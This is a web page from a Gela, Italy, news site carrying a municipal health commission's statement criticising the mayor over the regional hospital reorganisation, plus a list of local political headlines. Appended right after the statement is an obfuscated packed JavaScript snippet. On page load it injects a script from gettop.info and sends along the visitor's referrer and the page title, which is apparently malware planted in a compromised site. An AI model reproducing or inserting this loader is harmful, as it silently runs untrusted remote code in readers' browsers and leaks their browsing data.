Politica

Sanità: indifferenza amministrativa e i pazienti stanno a guardare

Sanità: indifferenza amministrativa e i pazienti stanno a guardare

Gela – Riceviamo  pubblichiamo la nota della commissione consiliare sanità.

“La V Commissione Sanità e Ambiente rimane basita di fronte all’incapacità dell’amministrazione di programmare e portare avanti le priorità che gli stessi cittadini, rappresentati dalle associazioni e dai consiglieri comunali, indicano loro. Dopo aver convocato il Sindaco al tavolo di lavoro sanità con le associazioni ed aver tracciato un percorso da condividere e ben determinato, anziché dare seguito ad incontri utili a bloccare l’Inter relativo al nuovo riordino della rete ospedaliera e alla sua approvazione, decide di convocare i sindacati ospedalieri e la direzione strategica, assumendo un ruolo, molto discutibile, se non su richiesta di una delle parti, di mediatore o peggio garante di uno dei due fronti. Entrati per caso alla riunione, non essendo stati, peraltro, invitati o informati, rileviamo il totale disagio delle parti nel doversi confrontare dinanzi ad un arbitro. Chiediamo al Sindaco maggiore determinazione, perché non si può pensare di bocciare il nuovo piano, da un lato, e sedersi con la direzione strategica per discutere la pianta organica, dall’altro. La Commissione procederà, come da impegno preso durante l’incontro con il Sindaco e le associazioni, a chiedere un tavolo alla Regione Siciliana con il presidente della regione, l’assessore Gucciardi, il presidente della VI Commissione all’ARS, Giuseppe Di Giacomo, la Direzione Strategica, il Sindaco e le associazioni. L’approvazione del nuovo riordino della rete ospedaliera, determinerà le scelte dei prossimi anni, quindi riteniamo di non perdere altre opportunità per garantire il nostro territorio ed i suoi cittadini; riteniamo che sia necessario imporre una direzione politica per il bene comune del nostro comprensorio”.eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))

banner vision

Stampa articolo
Visualizzazioni articolo: 94
Politica

di più in Politica

Sanità: il M5S regionale scende in campo per il caso ‘Gela’

Redazione26 giugno 2017

L’avvocato Massimiliano Conti nuovo Sindaco di Niscemi

Rosa Battaglia25 giugno 2017

Grasso ‘non farò il Governatore’

Redazione25 giugno 2017

Sfiducia sale a nove consiglieri: c’è il si di Casano e Sicilia Futura

Liliana Blanco24 giugno 2017

Pietro Grasso candidato alla Presidenza della Regione siciliana

Redazione22 giugno 2017

Crisi edilizia: ‘si preferiscano le imprese locali’

Redazione22 giugno 2017

Il Pd chiede un incontro al Presidente della commissione sanità regionale

Redazione22 giugno 2017

Sfiducia al sindaco: Articolo 1 dice si all’invito del M5S

Liliana Blanco21 giugno 2017

La commissione sanità sollecita la cura dell’ambiente

Redazione21 giugno 2017

Una ventata di freschezza nel panorama giornalistico locale. Una nuova avventura “web-based” voluta, creata e condotta da un team giovane e competente. Una piazza virtuale per tutti i gelesi sparsi nel mondo e non solo. Questo e molto altro nel nuovo web-magazine che racconterà Gela e il circondario attraverso notizie in tempo reale, approfondimenti e una particolare attenzione alle storie, ai personaggi e agli eventi.

iscritto al n.3/2010 del registro di stampa in data 28/05/2010 del tribunale di Gela
Direttore Responsabile: Rosa Laura Battaglia - Editore: Pubblivision P.IVA: 01991870856